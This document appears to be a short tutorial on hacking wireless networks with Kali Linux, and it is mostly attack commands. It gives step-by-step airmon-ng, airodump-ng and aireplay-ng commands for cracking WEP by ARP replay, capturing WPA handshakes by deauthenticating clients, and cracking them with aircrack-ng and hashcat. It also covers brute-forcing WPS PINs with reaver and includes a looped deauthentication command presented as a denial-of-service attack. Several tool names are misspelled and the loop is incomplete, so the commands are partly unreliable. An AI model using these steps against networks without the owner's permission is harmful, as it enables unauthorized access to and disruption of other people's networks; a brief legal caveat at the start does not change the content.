Quick guide to WLAN hacking

Sniffing traffic is perfectly legal, HOWEVER as soon as you start injecting packets or otherwise actually messing with a network you need permission from the owner or you ARE breaking the law.

Yes you can attack your own wifi network legally; No your neighbours network isn’t included in this unless they say you can (the owner/bill payer).

All of the following is done in Kali Linux.

iwconfig — find wifi adapter e.g. wlan0
airmon-ng start wlan0 — creates wlan0mon
airmon-ng check kill — checks card is running correctly in monitor mode, and kill interfering processes.


airodump-ng {interface} — sniff for all wlan networks on all channels

Once you’ve picked a wlan to attack, note down its channel, BSSID (AP MAC), and Name


Attacking and Cracking


stop the sniffer

start the sniffer locked to the network you’re attacking, and start saving the traffic using the name as the capture prefix

airomon-ng –channel {channel} –bssid {BSSID} –write {filePrefixName} {interface}


the quickest way to crack WEP is an ARP replay attack, WEP ciphers the data, but doesn’t alter the packet length.

Therefore this attack will scan for a 40 byte packet, then replay it to the network; Because its already encrypted its valid – but we don’t know what it says. so You may have to do this a couple of times until you hit pay dirt, but when you get a good one you’ll know quickly, as the Weak IV’s gathered will rocket up.

leave the sniffer running , then in a new terminal run either:

straight ARP replay using the first ARP packet detected,

airreplay-ng -3 -b {BSSID} {interface}

the same, but targeting ARP packets coming from CLIENT,

airreplay-ng -3 -b {BSSID} -h {CLIENT} {interface}

Once the IVs start racing, open another window and start calculating the WEP key, using the capture .pcap file.

aircrack-ng {capture.pcap}

As the sniffing and injection are still running even if this doesn’t crack it straight away it will recheck and add
the new packets in every few seconds, until it completes and gives you the key.




WPA is tricky, as only the first 3 packets (of the handshake) are vulnerable. To break this we have to capture these.

Generally the quickest way to do this is to forcibly de-authenticate a client, then capture their traffic as they automatically reconnect.

with the sniffer still running, open a new terminal window

either :

pick a network client from the sniffer window, and note their MAC then run

aireplay-ng -0 3 -a {BSSID} -c {CLIENT} {interface}


de-authenticate globally against the BSSID, this is not as effective but if no clients are visible its worth a punt to see if there is anything out there that’s being quiet.

aireplay-ng -0 3 -a {BSSID} {interface}


as a side note the de-authentication attack can also be used as a DoS attack against the client/network if its put in a loop

while [ 1 ]; do
  aireplay-ng -0 3 -a {BSSID} -c {CLIENT} {interface}


Once the sniffer has successfully captured a handshake it will tell you, it may even capture one without needing the de-authentication attack if its a busy network.

Now CTRL-C the sniffer.

Next you have to dictionary attack the capture, this could take years (literally) depending on the dictionary you use.

aircrack-ng {capture} {wordlist file}

You can also extract just the handshake packets to a HCCAP file for cracking in a fast heavy duty cracker with,

aircrack-ng {capture.pcap} -J {output.hccap}

then feed the output into hashcat (or oclHashcat/cudaHashcat for GPU based cracking this is HIGHLY RECOMMENDED if you want to to crack it during your lifetime…)

This cracker has lots of options, and some interesting wordlist mutation ability’s, but that’s  a separate guide all on its own.

there is a good wordlist included in Kali, but 2 mins on google can point you at a load more.


Pick the network you fancy having a go at, then CTRL-C the sniffer, you wont need it for this.

Instead we’ll use reaver, which will brute force the WPS PIN.


reaver -i {interface} -b {BSSID} –fail-wait=360

then walk away and watch a film or something, it could easily take a couple of hours, but if your lucky when you come back you’ll be able to connect to it using the WPS pin number.